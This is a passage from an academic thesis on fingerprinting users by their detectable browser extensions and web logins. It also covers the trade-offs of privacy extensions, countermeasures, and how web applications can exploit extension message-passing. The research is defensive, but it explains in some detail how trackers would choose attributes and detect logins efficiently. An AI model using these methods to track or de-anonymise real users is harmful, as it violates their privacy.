is not necessarily the globally optimal case.

Following the theoretical results of Gulyás et al. [197], we consider these two strategies:

(1) to target a specific user, and thus to select attributes that makes her unique with high

probability – called targeted fingerprinting algorithm, and (2) to uniquely identify a

majority of users in a dataset, and thus select the same set of attributes for all users – we

call it general fingerprinting algorithm. Targeted fingerprinting mainly uses popular

attributes if they are not detectable (e.g., popular extensions are not installed) or unpop-

ular ones if they are detectable. General fingerprinting instead, considers attributes that

are detectable roughly at half of the population (this allows to chose more independent

attributes which makes a fingerprint based on these attributes more unique).

Using the algorithms developed in [197], we performed experiments with general and tar-

geted fingerprinting. Our goal is to achieve results close to those in Section 4, but by

testing a smaller number of attributes 6.

5.3 Targeted fingerprinting

Attack outline. The attacker aims to identify a specific user with high probability. In

order to do this, the attacker needs to have information about the targeted user in her

dataset of fingerprints. The attacker generates a fingerprint pattern that consists of

a list of attributes with a known value, such as fj=[AdBlock=yes, LastPass=No, ...].

Notice that a fingerprint pattern contains not only extensions that the user installed, but

also extensions that are not installed. This information also helps to uniquely identify the

user.

Let us denote the user database as Dof nusers and mattributes, each row icorresponding

to user Uiand each column jcorresponding to attribute Aj. Let the algorithm target

user Ui. First, we need to find her most distinguishing attribute Aj, shared among the

smallest number of other users. Let us denote these users as Si,j . Then we need to find a

second most distinguishing property Akwhich separates Uifrom Si,j. Then the algorithm

continues searching for the most distinguishing attributes, until the given pattern makes

Uiunique (or there are no more acceptable choices left).

Evaluation. We applied targeted fingerprinting algorithm [197] on our datasets DExt, DLog ,

DExt ∩DLog and DExt ∪DLog , and computed a fingerprint pattern for each user. By using

these patterns, we have computed the anonymity sets for all datasets, that are identical to

those shown in Figure 7.7. We therefore omit repeating these results in a new figure.

For each unique user, the fingerprint pattern contains a smaller number of attributes than

the number of attributes detected for the user. For example, it is enough to test only

2 extensions for a user who has installed 4 detectable extensions. Figure 7.10 shows the

5. We evaluate performance in Section 6.

6. We reused the implementation of Gulyás et al., who shared their code [196].

PUT(0,-845.90042)

5. FINGERPRINTING ATTACKS 133

distribution of fingerprint pattern sizes of unique users (marked with “targeted”), and com-

pares them to the number of attributes detected for each user. The figure clearly shows

that fingerprint patterns are typically smaller than the number of detected attributes users

have.

For non-unique users, the size of the fingerprint pattern is often bigger than the number of

detected attributes the user has. Let us discuss this on our largest dataset DExt ∪DLog ,

but note that other datasets exhibit the same phenomena. For unique users, on average we

have 7.94 attributes detected, while the average size of fingerprint pattern is 3.94 attributes

only. For non-unique users, the average number of detected attributes is 5.41, while the

average size of fingerprint pattern grew up to 30.17. This result is not surprising: with less

information it is more difficult to distinguish users, and the fingerprint pattern may also

include negative attributes (i.e., LastPass=No means an extension should not be detected),

which can extend the length greatly.

Figure 7.10 – Comparison of fingerprint pattern size (targeted) and the total number of

detected attributes (detected) for unique users.

The targeted fingerprint is efficient, as it provides almost maximal uniqueness while re-

ducing the number of attributes. However, it cannot be used for new users, because the

attacker does not have any background knowledge about them. To reach a wider usability

with a trade-off in the fingerprint pattern size, we also consider general fingerprinting [197].

5.4 General fingerprinting

Attack outline. The purpose of this algorithm is to provide a short list of attributes,

called fingerprint template. If the attributes in a fingerprint template are tested for a

certain user, she will be uniquely identified with high probability. Similarly to the example

PUT(0,-845.90042)

134 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

of targeted fingerprinting, we consider the fingerprint template F=[AdBlock, LastPass,

...], that would yield the fingerprint fF

j=[yes, no, . . . ] for the user Uj.

The algorithm first groups all users into a set S. Then it looks for an attribute Aithat will

separate Sinto roughly equally sized subsets S1and S2if we group users based on their

attribute Ai. In the next round, it looks for another Aj6=Aithat splits S1, S2further into

roughly equally sized sets. This step is repeated until we run out of applicable attributes

or the remaining sets could not be sliced further.

(a) DExt - 5,474 users (b) DLog - 9,492 users (c) DE xt ∩DLog - 3,919

users

(d) DExt ∪DLog - 11,047

users

Figure 7.11 – Anonymity sets for different numbers of attributes tested by general finger-

printing algorithm.

Evaluation. To apply general fingerprinting, we first measure uniqueness by using all

attributes, which will be our target level A. Then, we run the algorithm until either it

stops by itself (e.g., fingerprint cannot be extended further), or we terminate it early when

the actual level of uniqueness B is less than 1% from level A.

Figure 7.11 shows the anonymity sets for different fingerprint lengths for our datasets

DExt , DLog ,DExt ∩DLog and DE xt ∪DLog , generated by the general fingerprinting algo-

rithm. For DExt and DLog, the algorithm provided fingerprint templates of 485 extensions

and 35 logins. In these cases the algorithm stopped since no more attributes could be used

for achieving better uniqueness – hence the final anonymity sets are very close to those in

Figure 7.7. In the cases of DExt ∩DLog and DE xt ∪DLog , we observed slow convergence

in uniqueness, thus we could stop the algorithm earlier (shown as white dots in Figure

7.11). As a result, for DExt ∩DLog , we can obtain 86.19% of unique users by testing 270

extensions and logins. For DExt ∪DLog , we can obtain 48.31% of unique users by testing

419 extensions and logins.

We conclude that the general fingerprint can achieve a significant decrease in the fingerprint

length while maintaining the level of uniqueness almost at maximum. In the next section

we discuss the performance of these results.

For DE xt dataset, general fingerprinting algorithm provides 485 extensions, but we found

out that 20 of these extensions were not stable (see Figure 7.3) and were not present in the

last month of our experiment. Using all extensions, including unstable ones, can be useful

to maintain fingerprint comparability with older data or with users having older versions

of extensions. However, if we constrain general fingerprinting to stable extensions only, we

get a fingerprint template of 465 extensions, leading to 50.33% uniqueness – still very close

to the results of baseline uniqueness results, which was 50.35% with stable extensions only.

PUT(0,-845.90042)

6. IMPLEMENTATION AND PERFORMANCE 135

6 Implementation and performance

In this section we discuss the design choices we made for our experimental website and

analyze whether browser extensions and Web logins fingerprinting is efficient enough to be

used by tracking companies.

To collect extensions installed in the user’s browser, we first needed to collect the extensions’

signatures from the Chrome Web Store. We collected 12,497 extensions in August 2017,

using the code shared by Sjösten et al. [249]. To detect whether an extension was installed,

we tested only one WAR per extension (see more details on WARs in Section 2). Because

the extensions’ signatures size was 40Mb and could take a lot of time to load on the

client side, we reorganized and compressed them to 600kb. However, testing all the 12,497

extensions at once took 11.3–12.5 seconds and was freezing the UI of a Chrome browser.

To avoid freezing, we split all the extensions in batches of 200 extensions, and testing all

the 12,497 extensions ran in approximately 30s.

Since testing all the extensions takes too long, trackers may not be using this technique in

practice. Therefore, we measured how much time it takes to apply the optimized finger-

printing algorithms from Section 5. Targeted fingerprinting addresses each user separately,

hence the number of tested extensions differs a lot from user to user. General fingerprinting

instead provides a generic optimization for all users. Based on our results from Section 5,

an attacker can test 485 extensions and obtain the same uniqueness results as with testing

all 12,497 extensions. Such testing can be run in 625 milliseconds with the signature file

size below 25Kb, which make real-life tracking feasible. For websites with limited traffic

volumes, extension detection alone could be used for tracking, or for websites with a higher

traffic load, it could contribute supplementary information for fingerprinting. Regarding

targeted fingerprinting the attacker can do even better, as such short patterns can be

detected in less than 10 milliseconds.

Compared to extension detection, Web login detection methods depend on more external

factors (such as network speed and how fast websites respond), thus they should be used

with caution. For redirection URL hijacking detection, we observed that the majority of

Web logins can be detected in 0.9–2.0 seconds, however the timing was much harder to

measure for the method based on CSP violation report. We observed that if the network

was overloaded and requests were delayed, then the results of login detection were not

reliable; however, it is likely that unreliable results can be easily discarded by checking

timings of results (e.g., large delays appearing only in few cases).

Moreover, we found a bug in the CSP reporting implementation in the Chrome browser that

makes this kind of detection even more difficult. In fact, without a system reboot for more

than a couple of days (we observed that this varies between one day to multiple weeks),

the browser stopped sending CSP reports. We reported the issue to Chrome developers, as

this bug not only makes CSP-based detection unreliable, but more importantly CSP itself.

7 The dilemma of privacy extensions

Various extensions exist that block advertisement content, such as AdBlock [6], or block

content that tracks users, such as Disconnect [47]. Such extensions undoubtedly protect

users’ privacy, but if they are easily detectable on an arbitrary webpage, then they can

contribute to users’ fingerprint and can be used to track the user across websites. In

our experiment based on detecting extensions via WARs, we could detect four privacy

extensions: AdBlock [6], Disconnect [47], Ghostery [61] and Privacy Badger [117]. The

goal of this section is to analyze the tradeoff between the privacy loss (how fingerprintable

PUT(0,-845.90042)

136 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Figure 7.12 – Uniqueness of users vs. number of unblocked third-party cookies

users with such extensions are) and the level of protection provided by these extensions.

To understand this tradeoff, we computed (i) how unique are the users who install privacy

extensions; (ii) how many third-party cookies are stored in the user’s browser when a

privacy extension is activated (the smaller the number of third-party cookies, the better

the privacy protection). We analyzed four privacy extensions detectable by WARs and 16

combinations of these extensions: AdBlock [6], Disconnect [47], Ghostery [61] and Privacy

Badger [117].

First, we measured how a combination of privacy extensions contributes to fingerprinting.

To measure uniqueness of users for a combination of extensions (i.e., AdBlock+Ghostery),

we removed other privacy extensions from the DExt dataset 7(i.e., Disconnect and Privacy

Badger), and then evaluated the percentage of unique users for each combination.

Second, we measured how many third-party cookies were set in the browser, even if privacy

extensions were enabled. We performed an experiment, where for each combination of

extensions, we crawled the top 1,000 Alexa domains, visiting homepage and 4 additional

pages in each domain8. We kept the browsing profile while visiting pages in the same

domain, and used a fresh profile when we visited a new domain. We explicitly activated

Ghostery, which is deactivated by default, and trained Privacy Badger on homepages of

1,000 domains before performing our experiment. We collected all the third-party cookies

that remained in the user’s browser for each setting and divided it by the number of

domains crawled.

Figure 7.12 reports on the average number of cookies that remained in the browser for each

combination of extensions, and the corresponding percentage of unique users.

Similarly to the results of Merzdovnik et al. [226], Ghostery blocks most of the third-party

cookies, and the least blocking extension is AdBlock. Surprisingly, some combinations such

as Disconnect + Ghostery resulted in more third-party cookies being set than for Ghostery

7. The total number of users does not change since we simply remove certain extensions from the user’s

record in our dataset.

8. We have extracted the first 4 links on the page that refers to the same domain.

PUT(0,-845.90042)

8. COUNTERMEASURES 137

alone – even after double checking the settings, and re-running the measurements, we do

not have an explanation for this phenomena. However, as this can have a serious counter-

intuitive effect on user privacy, it would be important to investigate this in future work.

More privacy extensions indeed increase user’s unicity. All of these privacy extensions are

also part of the general fingerprint we calculated in Section 5.4. However, this has little

importance in practice. If we ban the general fingerprint algorithm from using privacy

extensions, it will generate a fingerprint template of 531 (instead of 485) extensions, lead-

ing to a uniqueness level of 51.27%. While 46 is a significant increase in the number of

extensions for fingerprinting, as we have seen it already, this would only contribute very

little to the overall timing of the attack.

On the other hand, as this experiment revealed, these extensions are also very useful to

block trackers. We could therefore conclude that using Ghostery is a good trade-off between

blocking trackers and avoiding extension-based tracking. However, in order to efficiently

solve the trade-off dilemma, we believe that such functionality should be included by default

in all browsers.

8 Countermeasures

We provide recommendations for users who want to be protected from extensions- and

logins-based fingerprinting. We also provide to developers recommendations to improve

browser and extensions architecture in order to reduce the privacy risk for their users.

Countermeasures for extension detection. Extension detection method based on

Web Accessible Resources detects 28% of Google Chrome extensions, while for Firefox the

number is much smaller: 6.73% of extensions are detectable by WARs [249]. Firefox gives

a good example of browser architecture that makes extensions detection difficult. The

upcoming Firefox extensions API, WebExtensions, which is compatible with Chrome ex-

tensions API [25], is designed to prevent extensions fingerprinting based on WARs: each

extension is assigned a new random identifier for each user who installs the extension [152].

To protect the users, developers of Chrome extensions could avoid Web Accessible Re-

sources by hosting them on an external server, however this could lead to potential privacy

and security problems [249]. Developers of the Chrome browser could nonetheless im-

prove the privacy of their users by adopting the random identifiers for extensions as in

WebExtensions API.

Most of the browsers are vulnerable to extension detection, and websites could also de-

tect extensions by their behavior [260]. Therefore today users cannot protect themselves

completely, but they still can minimize the risk by using browsers such as Firefox, where

a smaller fraction of extensions are detectable.

Countermeasures for login. Users may opt for tracker-blocking and adblocking exten-

sions, such as Ghostery [61], Disconnect [47] or AdBlockPlus [7]. But these extensions block

requests to well-known trackers, while Web logins detection sends requests to completely

legitimate websites, where the user has logged into anyway. Another option is to install

extensions that block cookies arriving from unknown or undesirable domains. These ex-

tensions do not protect users for the same reason: cookies that belong to websites that the

user visits (and treated as first-party cookies) are the same cookies used for login detection

(with the only difference that the same cookies are treated as third-party cookies). For

example social websites, such as Facebook or Twitter, use first-party cookies. Their social

button widgets with third-party cookies may still be allowed by the browser extensions in

the context of other websites. Therefore, users can protect themselves from Web logins

detection, only by disabling third-party cookies in their browsers.

PUT(0,-845.90042)

138 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Website owners could also react to such potential privacy risk for their users. In our

case, this would simply mean filtering login URL redirection, and sanity checking other

redirection mechanisms against the CSP-based attack. Unfortunately, this issue has been

known for a while, but website owners do not patch it because they do not consider this

as a serious privacy risk [223].

Browser vendors could help avoid login detection by blocking third-party cookies by default.

The new intelligent tracking protection of the Safari browser takes a step in the right

direction, as it blocks access to third-party cookies and deletes them after a while.

9 Discussion and future work

Realistic datasets. To compare our study with previous works on fingerprinting by

browser extensions, we analyzed different random subsets of 7,643 users, who run Chrome

web browser (where browser extension detection is possible in our experiment). Figure 7.13

shows how user uniqueness based on extensions changes with respect to the various subsets

of our dataset. It clearly demonstrates an intuition that the smaller the user set is, the

smaller is the diversity of users, and the easier it is to uniquely identify them.

Figure 7.13 – Uniqueness of Chrome users based on their extensions only vs. number of

users - 204 is the number of users used in [245] and 854 the number of users considered

in [260]

Figure 7.13 compares our results to previous studies on browser extensions fingerprinting:

we have 7,643 Chrome users, while previous studies had 204 [245] and 854 [260] users, and

therefore draw different conclusions about uniqueness of users based on browser extensions.

We reported on the number of unique users in subsets of 204 and 854 users in Section 3.2

(see Table 7.2). By exploring this comparison, we raise a fundamental question: What is

the “right” size for the dataset?

Taking a look at research on standard fingerprinting, in 2010 Eckersley showed that 95% of

browsers were unique based on their properties [185], which was backed by several papers

since then [173,221]. However, a recent study states that by looking at 2 million fingerprints

in 2018, the authors only found 33.6% of those fingerprints to be unique [191].

It is extremely difficult for computer scientists to get access to such large datasets – in our

PUT(0,-845.90042)

10. CONCLUSION 139

experience, we advertised our experiment website through all possible channels, including

Twitter, Reddit, and press coverage. We experienced that having larger, high quality

datasets is a highly nontrivial research task. It is important to re-evaluate our results over

time while also aiming to obtain larger dataset sizes.

Stability of fingerprints While studying uniqueness based on various behavioral features,

it is very important to know how stable these features are, as the ability to use some of

this information as part of a fingerprint does not solely depend on its anonymity set of

overall entropy, but also on the information stability (i.e., how frequently it changes over

time). Vastel et al. [266] recently analyzed the evolution of fingerprints of 1,905 browsers

over two years. They concluded that fingerprints’ evolution strongly depends on the type

of the device (laptop vs mobile) and how it is used. Overall, they observed that 50% of

browsers changed their fingerprints in less than 5 days.

In our study we did not have enough data to make any claims about the stability of the

browser extensions and web logins because only few users repeated an experiment on our

website (to be precise, only 66 users out of 16,393 users have made more than 4 tests

on our website). We would expect that browser extensions are more stable than logins

since users do not seem to change extensions very often, while they may log in and log

out of various websites during the day. However, studying the stability of extensions and

logins would require all our users to install a tool (probably a browser extension) in their

browsers that would monitor the extensions they install and logins they perform. This kind

of experiment would be even harder to perform at large scale since users do not easily trust

to install new browser extensions. In AmIUnique experiment, Laperdrix [218] was trying

to measure stability of browser fingerprints – he collected data from 3,528 devices over a

twenty-month-long experiment. We managed to have 16,393 users testing our website in 9

months. This shows that users have more trust in testing their browser on a website than

installing new extensions.

We therefore keep the study of fingerprints stability for future work and raise an impor-

tant question in privacy measurement community: How can we ensure a large scale

coverage of users for our privacy measurement experiments?

10 Conclusion

This chapter reports on a large-scale study of a new form of browser fingerprinting technique

based on browser extensions and website logins. The results show that 18.38% of users

are unique because of the extensions they install (54.86% of users that have installed at

least one detectable extension are unique); 11.30% of users are unique because of the

websites they are logged into (19.53% are unique among those who have logged into one or

more detectable websites); and 34.51% of users are unique when combining their detected

extensions and logins (89.23% are unique among users with at least one extension and one

625 ms.

This work illustrates, one more time, that user anonymity is very challenging on the Web.

Users are unique in many different ways in the real life and on the Web. For example, it

has been shown that users are unique in the way they browse the Web, the way they move

their mouse or by the applications they install on their device [201]. This work shows that

users are also unique in the way they configure and augment their browser, and by the

sites they connect to. Unfortunately, although uniqueness is valuable in society because

it increases diversity, it can be misused by malicious websites to fingerprint users and can

therefore hurt privacy.

PUT(0,-845.90042)

140 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Another important contribution of this work is the definition and the study of the trade-off

that exists when a user decides to install a “privacy” extension, for example, an extension

that blocks trackers. This work shows that some of these extensions increase user’s unicity

and can therefore contribute to fingerprinting, which is counter-productive. We argue that

these “privacy” extensions are very useful, but they should be included by default in all

browsers. “Privacy by default”, as advocated by the new EU privacy regulation, should be

enforced to improve privacy of all Web users.

PUT(0,-845.90042)

Part III

Browser Extensions

141

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Introduction

The concept of browser extensions or addons, regardless of the underlying architecture

or browser, always exhibits very common characteristics: they are third party codes that

execute in browsers with elevated privileges, giving them access to features and user data

that traditional web applications for instance cannot directly access. In the past, different

browsers have supported different systems for extensions development. Egele et al. [186]

applied a dynamic analysis system to detect spyware in the Internet Explorer Browser

Helper Objects (BHOs). Authors had also shown the dangers of misusing the powerful APIs

provided to Firefox XPCOM extensions and proposed tools for discovering vulnerabilities

and securing extensions [170,224,232,233]. Barth et al. [172] analyzed the Firefox XPCOM

architecture and proposed a new extensions architecture that has since been adopted by

Google Chrome and evolved into the Chrome Extensions API compatible with the cross-

browser WebExtensions API. Among other things, the permissions system in extensions

was meant to reduce extensions capabilities, and hence reduce the harms that attackers

can cause if they compromise an extension. However a good number of studies have shown

that many extensions still request too many permissions [195,202,213].

The WebExtensions API [100] has been introduced by Firefox as a cross-browser platform

for developing extensions that run on many browsers. To a large extent, it is compati-

ble with the Chrome extension API [25], Opera Extension API [110] and Microsoft Edge

Extension API [2]. Carlini et al. [181] reviewed 100 Chrome extensions and found many

vulnerabilities due to the injection of insecure scripts (loaded over insecure HTTP chan-

nels), inline scripts, and the use of eval-like functions, used for turning strings into code.

Their proposal of banning these insecure practices is now part of the browsers extensions

APIs [2,25,100,110].

Guha et al. [195] proposed IBEX, a platform for writing cross-browser extensions in high-

level type safe languages such as .NET and a secure subset of JavaScript. Finding the

permission system of Chrome extension API too coarse-grained, they propose to specify

more fine-grained access control and data flow policies for extensions. Then they provide

tools for verifying the compliance of the extension with the security policies.

Kapravelos et al. [213] introduced Hulk, for discovering malicious extensions with a dynamic

analysis system in which they monitor the execution and network traffic of extensions. To

trigger extensions behavior, they present honeypages and are able to generate on-the-fly

elements that extensions require access to. Then, they use a fuzzer to trigger network

events listeners in the extension, to which they present mock network objects. Applying

Hulk to Chrome extensions allowed them to discover malicious extensions performing user

credentials theft, social network abuse, etc.

Following the idea of honey pages, Weissbacher et al. [270] introduced Ex-Ray for discov-

ering history-leaking Chrome extensions.

Starov and Nickiforakis [259] also performed a dynamic analysis of Chrome extensions and

found many extensions leaking sensitive user information such as browsing history, search

143

PUT(0,-845.90042)

144

queries, form data and extensions list to third parties.

Calzavara et al. [176] modeled the Chrome browser extension system, and formalized the

privileges that an opponent can escalate thanks to the message passing API between web

applications and extensions content scripts. They then proposed a prototype implementa-

tion of their system, named CHEN, which can be used by extension developers to evaluate

the robustness of an extension against privilege escalation and help them refactor their

extensions.

Communications with web applications

In Chapter 8, we present the first large-scale study on the security and privacy implications

of the communications between browser extensions and web applications, allowing the latter

to benefit from extensions privileged capabilities. We built a static analysis for analyzing

extensions and identified a good number of them, demonstrating how these extensions

can be exploited by web applications to benefit from extensions privileged capabilities and

thereby access sensitive user information: bypass the SOP and read user data on any web

application, access user cookies, browsing history, bookmarks, list of installed extensions,

store and retrieve data from extension storage for tracking purposes, or even trigger the

download of malicious files on the user’s device.

Our work has some similarities with the work of Calzavara et al. [176], since we are also

interested in the message passing interfaces. However, technically, we believe that our tool

is more engineered than their implementation prototype and the goal of their study was

not to systematically study the security and privacy implications of the message passing

interfaces at large-scale. For instance, they did not model many of Chrome sensitive APIs,

and the related threats, as we have done in this work. The way message handlers are

extracted and analyzed is also very different. While they considered only the first function

registered as listener, our tool is able to track sensitive APIs calls in the first handler and

all of its dependencies (functions that it further invokes). Moreover, their tool does not

consider the complexities of JavaScript function invocations, object properties accesses,

which influences the precision of the tool to detect APIs calls and listeners registration.

Content scripts in the Chrome extension API [25] at the time of their study were not privi-

leged. In other words, they always needed to forward messages to the background pages in

order to get access to the privileged APIs. Content scripts in WebExtensions however are

privileged: they are not subject to the Same Origin Policy, and have access to the extension

storage. They also did not consider direct communications between extensions background

pages and webpages, while we found this practice widespread among extensions. The long-

term communications (ports) between content scripts and background pages were also not

considered. While they did not perform any large-scale analysis with their system, we an-

alyzed Chrome, Firefox and Opera extensions and discovered many of them with different

security and privacy threats.

CORS headers manipulations

In Chapter 9, we study the implications of CORS headers manipulations by browser ex-

tensions. We first developed CORSER, a cross-browser extension that tampers with CORS

headers so as to authorize unauthorized cross-origin requests. If the development of such

an extension requires little effort, it rather requires a good understanding of the CORS

mechanism. Worryingly, we found that such an extension is considered benign from a

browser vendors perspective. In fact, it successfully passed extensions review processes on

PUT(0,-845.90042)

145

Chrome, Firefox and Opera where we published it. Furthermore, we performed an em-

pirical study on extensions permissions and found that around 10% of Chrome, Firefox

and Opera extensions have the capability to disable the SOP in browsers by tampering

with CORS headers. We further statically analyzed extensions source codes and found

that a few of them effectively tamper with CORS headers to allow cross-origin requests.

But more surprisingly, we found that many extension developers misunderstand the CORS

mechanism, as they manipulate HTTP headers in a way that fails legitimate CORS re-

quests, thereby breaking web applications running in the user browser. Finally we discuss

countermeasures and different proposals as to improve the security and privacy of users,

and the security of web browsers and applications.

To the best of our knowledge, only two works have studied the manipulation of security

headers by browser extensions. By analyzing the network traffic generated by Chrome ex-

tensions, Kapravelos et al. [213] flagged 24 of them as malicious because they were tamper-

ing with Content-Security-Policy and X-Frame-Options security headers. Hauskenetch

et al. [200] found many extensions tampering with the Content-Security-Policy and

proposed an endorsement mechanism, which can be implemented by browsers and web

servers, to authorize or not CSP headers modifications. Tampering with these two headers

leaves a web application unprotected against the attacks they mitigate, namely Cross-Site

Scripting [41] and clickjacking [244] attacks.

Our work is the very first that addresses the ability of extensions to directly disable the

Same Origin Policy in browsers, by appropriately tampering with CORS headers. Con-

trary to other security headers which when remove introduce security threats in specific

web pages, and further require that the page has a vulnerability that an attacker can ex-

ploit, tampering with CORS headers however removes the Same Origin Policy protection

in browsers, giving attackers unrestricted access right away to all user data in any web ap-

plication. As we have also shown, harshly tampering with CORS headers can even break

the normal functionality of web applications, preventing a user from using her favorite

applications in the browser.

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Chapter 8

Implications of the communications between

browser extensions and web applications

Preamble

This chapter reports the results of an analysis of the communications between browser

extensions and web applications. We found many extensions that can be exploited by web

applications to access sensitive user information.

This chapter is under submission

1 Introduction

In this work, we focus on the WebExtensions API, the cross-browser extensions system

compatible with major browsers including including Chrome, Firefox, Opera and Microsoft

Edge [2,25,100,110]. Extensions can make HTTP requests to get data from any web appli-

cation server, including those where users are logged into, such as their mailing, banking,

social network applications, etc. As a comparison, web applications are bound by the Same

Origin Policy (SOP) [125] and cannot access other web applications data, unless they both

implement mechanisms such as Cross-Origin Resource Sharing (CORS) [40]. Web applica-

tions can store information in the user browser (cookies, HTML5 localStorage, cache, etc.).

However, since such storage mechanisms can be abused for tracking purposes [225,242],

modern browsers provide users with the ability to prevent, control or remove information

that web applications can store. Extensions on the contrary, have access to a persis-

tent storage, in where they can store and retrieve data as long as they are installed in a

browser. Even when users clear their browsing data, extensions storages are not affected.

Other privileged APIs that browser extensions can use, are APIs to read and write user

browsing history, bookmarks, cookies, manage the list of extensions the user has installed,

or even trigger the download of arbitrary files and save them in the user’s device.

For security reasons, extensions and web applications execute in different and isolated con-

texts. Extensions can inject content directly in the execution context of web applications,

but the contrary is not possible. Nonetheless, there are many mechanisms that can be used

by extensions and web applications to exchange data. First of all, extensions have access

to web applications DOM and localStorage, which they can read and write while executing

in their separate contexts. These modifications are visible to both sides (extension and

web application), and can thus serve as means for sharing data. Moreover, extensions and

web apps can set up communication channels to exchange data with one another using the

postMessage API [39] for instance.

147

PUT(0,-845.90042)

148 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

In this work, we focus on the communications channels that extensions can establish with

web applications to exchange data. The messages the extensions expect from web appli-

cations, and more importantly how they handle them, is entirely up to the developers of

the extensions. For instance, an extension can allow an application to send it the URL

of a resource (data) hosted by another web application. It then makes a request to fetch

the data (since it can do so with any web application as it is not subject to the SOP) and

returns the response to the web application that previously sent the message. Another

extension may allow a web application to send information that it will store in its persis-

tent storage. Later on, the same application can send a message to the extension, which

retrieves the previously stored data, and returns it back to the application. Yet again in

another scenario, upon receiving a message from an application, an extension can retrieve

the list of extensions the user has installed, or their browsing history, bookmarks, cookies

and send them back to the application. Hence, these communications channels are a way

for an extension to indirectly give a web application access to browser features and APIs

that the web application is not directly allowed to access.

We built a static analyzer and applied it to the message passing interfaces exposed by

Google Chrome, Firefox and Opera extensions to web applications. When the tool found

that a privileged extension capability could potentially be exploited by web applications,

the extension was flagged suspicious. By manually reviewing the code of suspicious exten-

sions, we found that 197 of them (mostly on Chrome) can be exploited by web applications

(attackers) to access elevated browser features and APIs and sensitive user information.

Our results let us analyze the security and privacy implications of the communications

between extensions and web applications. Extensions can be exploited by web applica-

tions to bypass the Same Origin Policy and access user data on any application including

those applications where the user is logged into. Persisting data in the extension storage

can be exploited by a web application to uniquely identify the user and track her even

though she used privacy features provided by modern browsers such as blocking cookies,

cleaning applications storages, etc. By reading the user’s credentials (cookies), an attacker

can perform session hijacking attacks [129], access user data and take arbitrary actions on

her behalf. In addition, accessing the user’s browsing history or bookmarks violates her

privacy, and represents valuable information, which in the hands of an attacker, can be

used to serve targeted advertisement, or even uniquely identify the user for tracking pur-

poses. Discovering the list of extensions a user has installed reveals information about the

user’s interest and can serve to fingerprint her browser [198,245,249,260]. Finally, being

able to trigger downloads can be exploited by an attacker to add malicious software to the

user’s device. Inadvertently executing such software could let an attacker take control of

the user’s device and perform malicious actions (exfiltrating or damaging her data).

In summary, this work shows the security and privacy threats associated with the interac-

tions between browser extensions and web applications and makes the following contribu-

tions:

— We built a static analysis tool and analyzed extensions message passing interfaces

at large-scale: 66,401, 9,391 and 2,523 extensions on Chrome, Firefox and Opera re-

spectively. About 4.97%, 5.14% and 8.48% of Chrome, Firefox and Opera extensions

respectively were flagged as suspicious.

— We identified 197 extensions that pose various security and privacy threats to browsers,

web applications, and users. They can be exploited by web applications to bypass

the SOP, read user cookies, browsing history, bookmarks, list of installed extensions,

store and retrieve data from the extension storage, or download malicious files and

store them on the user device.

PUT(0,-845.90042)

2. CONTEXT 149

Our findings raise many questions about the security and privacy design of extensions.

Despite the threats of the aforementioned interactions between extensions and web appli-

cations, we found no browser vendor that warned users about the possible threats posed

by the extension they install. We argue that browser vendors need to review extensions

more rigorously, in particular take into consideration the security and privacy threats that

we have identified. The static analysis tool we have developed could be applied to any

extension on major browsers in order to identify and fix the threats described in this work,

before the extension is made public for users to install and use.

2 Context

Figure 8.1 – Browser extensions architecture - Communications with web applications

Extensions can be divided in three main parts, as shown in Figure 8.1. The background

page is the main part of the extension. It has full access to all the capabilities of the

extension. Users interact with the extension through UI pages (i.e. UI elements, options

and setting pages), in order to enable or disable it, or customize its behavior. UI pages

also have access to the full capabilities of the extension. Content scripts are injected by

extensions to run along web applications. Even though they are not granted access to all

the extension capabilities, they can directly use the host and storage permissions to access

user data on any web application or to store and retrieve data from the extension storage.

Content scripts can also manipulate the DOM of webpages [48] and inject content in them.

On Chrome and Opera, each extension is assigned a permanent unique identifier, which is

the same for all users of the extension. Firefox however generates a random identifier for

the extension, per user browser [52].

2.1 Interactions

Background and UI pages have direct access to each other’s execution contexts [19], but

content scripts execute in a separate context. Web applications run in yet other separate

execution contexts. Nonetheless, content scripts have direct access to web applications

localStorage, DOM, and execution context, where they can inject and execute arbitrary

scripts.

Even though content scripts, background pages and web applications run in separate ex-

ecution contexts, they can establish communication channels to exchange messages with

one another [93,107] as shown in Figure 8.1. We describe below the APIs for sending and

receiving (listening for) messages between the content scripts, background pages and web

applications.

Content scripts and background pages There are two types of communication chan-

nels: one-time and long-lived channels. One-time channels are opened to send a message

PUT(0,-845.90042)

150 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

and are closed after the response is received. Long-lived channels, connections or ports,

are maintained open to exchange multiple messages. A port can have a name in order to

distinguish it from other long-lived channels.

For one-time messages, content scripts use the runtime.sendMessage API to send messages

to background pages. Similarly, background pages employ the tabs.sendMessage API to

send messages to content scripts. For receiving messages, both components can invoke the

runtime.onMessage.addListener API.

Similarly, runtime.onConnect.addListener and runtime.connect are used to establish

long-term communications between background pages and content scripts.

Web applications and content scripts Exchanges between web applications and con-

tent scripts are achieved with the Cross-Origin Communications API [39]: postMessage is

used for sending messages, and onmessage or addEventListener to receive messages. Be-

low is a listing which shows how messages are sent and received between web applications

and content scripts.

// S end a n d r e ce i v e

postMessage(" H el l o E x t e ns i o n " ,"*");

addEventListener("message",function(e ve n t ){

Received_response =event.data;

}) ;

// R ec e i ve a n d R e p ly

addEventListener("message",function(e ve n t ){

Received_message =event.data;

postMessage(" H el l o W e b A p p li c a t io n " ,"*")

}) ;

In this example, the web application sends the message Hello Extension to the content

script, which receives and writes it in the variable Received_message. Then it replies with

Hello Web application, which the web application receives and saves in the variable

Received_response.

Web applications and background pages On Chrome and Opera, web applications

can also directly communicate with extensions background pages. To do so, extensions

have to declare in their manifest.json file, using the externally_connectable key, the

list of web applications, where communication with the background page is allowed. For

security reasons, one cannot use wildcard (for instance *) to allow communications between

the background pages and all web applications. Additionally, communications can only be

initiated by web applications.

The runtime.sendMessage and runtime.connect APIs are exposed to web applications in

Chrome and Opera, and can be used to send one-time messages or establish long-term con-

nections with background pages. The APIs runtime.onMessageExternal.addListener

and runtime.onConnectExternal.addListener are used in the background page, to re-

ceive and reply to messages sent by web applications. Below is an example of how to send

a message from a web application to the background page of an extension which unique

